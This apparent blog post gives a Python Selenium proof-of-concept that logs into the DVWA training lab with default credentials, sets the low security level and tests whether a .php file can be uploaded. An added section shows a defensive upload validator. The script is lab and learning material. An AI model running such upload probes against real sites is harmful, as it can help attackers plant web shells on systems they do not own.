
POC: DVWA's File Upload

Author: Internet

Level: low

I recently learned a bit about Python's selenium, so I might as well use it to write a POC~

from selenium.webdriver import Chrome
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.common.by import By
from selenium.webdriver.support.select import Select

# Log in to DVWA
driver = Chrome()
driver.get("http://192.168.117.130/DVWA-1.9/login.php")
WebDriverWait(driver, 10).until(lambda d: "Login" in d.title)
driver.find_element(By.XPATH, '//*[@id="content"]/form/fieldset/input[1]').send_keys("admin")
driver.find_element(By.XPATH, '//*[@id="content"]/form/fieldset/input[2]').send_keys("password")
driver.find_element(By.XPATH, '//*[@id="content"]/form/fieldset/p/input').click()

# Open the DVWA Security page and set the security level to "low"
driver.find_element(By.XPATH, '//*[@id="main_menu_padded"]/ul[3]/li[1]').click()
driver.find_element(By.XPATH, '//*[@id="main_body"]/div/form/select').click()
loc = (By.XPATH, '//*[@id="main_body"]/div/form/select')
ele = driver.find_element(*loc)
s = Select(ele)
s.select_by_value("low")
driver.find_element(By.XPATH, '//*[@id="main_body"]/div/form/input[1]').click()

# Open the File Upload page and submit the test file
# (raw string so the backslashes in the Windows path are not treated as escapes)
driver.find_element(By.XPATH, '//*[@id="main_menu_padded"]/ul[2]/li[5]').click()
driver.find_element(By.XPATH, '//*[@id="main_body"]/div/div/form/input[2]').send_keys(r'F:\Python\Project\POC\POC(Proof Of Concept)\one.php')
driver.find_element(By.XPATH, '//*[@id="main_body"]/div/div/form/input[3]').click()
response = driver.find_element(By.XPATH, '//*[@id="main_body"]/div/div/pre')

# The upload counts as accepted if the response text contains the file name
# (named uploaded_name rather than re, to avoid shadowing the standard re module)
uploaded_name = 'one.php'
flag = uploaded_name in str(response.text)

if flag:
    print("It looks likely vulnerable")
else:
    print("It is strong")

# quit() closes the window and also ends the chromedriver session
driver.quit()
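
The POC above reports the target as likely vulnerable when the upload response contains the name one.php, that is, when a .php file was accepted under the name the client supplied. The following is an added example, not part of the original post and not DVWA's own code (DVWA is written in PHP): a server-side upload check sketched in Python that would reject that file. `validate_upload`, `ALLOWED` and `MAX_BYTES` are hypothetical names, and the sample inputs are constructed.

```python
import os
import secrets

# Constructed allowlist: extension -> accepted leading magic bytes.
ALLOWED = {
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".gif": (b"GIF87a", b"GIF89a"),
}
MAX_BYTES = 100_000  # hypothetical size limit


def validate_upload(client_name: str, data: bytes) -> str:
    """Return a server-chosen storage name, or raise ValueError."""
    # Drop any directory part the client sent (both separator styles).
    base = os.path.basename(client_name.replace("\\", "/"))
    if "\x00" in base:
        raise ValueError("NUL byte in filename")
    # Only the final extension counts, compared case-insensitively.
    ext = os.path.splitext(base)[1].lower()
    if ext not in ALLOWED:
        raise ValueError(f"extension {ext!r} not allowed")
    if not 0 < len(data) <= MAX_BYTES:
        raise ValueError("empty or oversized upload")
    # The content must start with the magic bytes of the claimed type.
    if not data.startswith(ALLOWED[ext]):
        raise ValueError("content does not match extension")
    # Never reuse the client's name: random name plus allowlisted extension.
    return secrets.token_hex(16) + ext


if __name__ == "__main__":
    # Constructed sample inputs (not taken from the original post).
    samples = [
        ("one.php", b"<?php echo 'constructed sample'; ?>"),
        ("one.php.png", b"<?php echo 'constructed sample'; ?>"),
        ("..\\..\\photo.png", b"\x89PNG\r\n\x1a\n" + b"\x00" * 16),
    ]
    for name, body in samples:
        try:
            print(name, "-> stored as", validate_upload(name, body))
        except ValueError as exc:
            print(name, "-> rejected:", exc)
```

A crafted file can still pass content checks like this one, so the upload directory should also be configured so that nothing stored in it is executed.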

Source: https://www.cnblogs.com/wavesky/p/16371619.html